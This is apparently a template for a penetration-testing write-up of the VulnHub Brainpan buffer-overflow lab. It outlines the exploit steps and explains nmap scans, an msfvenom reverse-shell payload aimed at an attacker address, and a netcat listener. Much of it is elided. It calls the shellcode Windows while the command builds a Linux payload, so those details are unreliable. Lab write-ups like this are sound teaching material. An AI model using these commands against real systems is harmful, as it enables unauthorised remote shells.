What is the environment of the target ? What kind of technology is needed for the attack ? What is the purpose of process ?
The process to develop the exploit in this post will follow the following eight steps:
Example:
Step 1 Fuzzing Step 2 Replicating the Crash Step 3 Finding the Offset to the EIP Register Step 4 Controlling the EIP Register Step 5 Finding Space for Shellcode Step 6 Finding Bad Characters Step 7 Jumping to the ESP Register Step 8 Writing the Exploit
A Windows host or virtual machine
A Kali Linux host or virtual machine
OllyDbg
Python
Searchsploit
Firefox
Msfvenom
we need to be required to fill out this penetration testing document fully and to include the following sections :
Example:
The first thing to know is the local network address by using the ip addr command.
Because the VulnHub virtual machines are in a downloadable and self-hosted format the machine gets an IP address from DHCP when it starts. This means that unlike online challenges such as Hack The Box the IP address of the machine is somewhat “unknown” beforehand.
The first thing to know is the local network address by using the ifconfig command.
nmap -sP 192.168.33.0/24
Running an initial scan with Nmap reveals ports 9999 and 10000 are open.
nmap -n -sV -Pn -T4 192.168.33.129 -oA nmap/initial
command exaplain:
nmap - network scanner tool used to discover hosts and services on machines.
-n - No DNS resolution
-sC - preforming script scan using default scripts.
-sV - preforming service version detection.
-oA - output in all formats.
-Pn - treating the host as online - skip host discovery (it was necessary for nmap scan on this machine).
dirb scan reveals an interesting bin directory.
Visiting the bin directory with the Firefox browser reveals a downloadable executable with the name brainpan.exe.
Suspecting exe application is vulnerable to a buffer overflow attack a simple Python fuzzer can be written to test this.
Now that we know the brainpan.exe application is vulnerable to a buffer overflow attack it is time to configure the debugging environment to help develop an exploit. Make sure to startOllyDbg as Administrator, a window looking like the one below should appear.
.
.
.
it is time to finish the exploit by generating and adding some shellcode .
Msfvenom can be leveraged to generate a Windows reverse shell shellcode that connects back to a listener on our attacking machine. Make sure to exclude any bad characters that where found in Step 6 with the -b option. The generated shellcode is 351 bytes long which neatly fits in the 522 C’s we have added to our buffer variable.
Note the use of EXITFUNC=thread to make an application crash less likely when the process crashes or exits.
command explain:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.33.110 LPORT=4444 EXITFUNC=thread -a x86 —platform linux -b “\x00” -f c > sheelcode_linux_test.txt
msfvenom - rapid7 (creators of metasploit tool) tool for payload generation.
LHOST - attacker ip address.
LPORT - attacker ip port.
Options:
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder The encoder to use
-a, --arch The architecture to use
--platform The platform of the payload
--help-platforms List available platforms
-s, --space The maximum size of the resulting payload
--encoder-space The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
nc -nvlp 4444
nc - netcat, tcp and udp tool for connections and listens.
-l - listen for connections.
-v - verbose output.
-p - port number.
……
…..
…..
……
This challenge helped me understand the process behind xxx and what goes on under the xxx a lot better. Documenting the process ……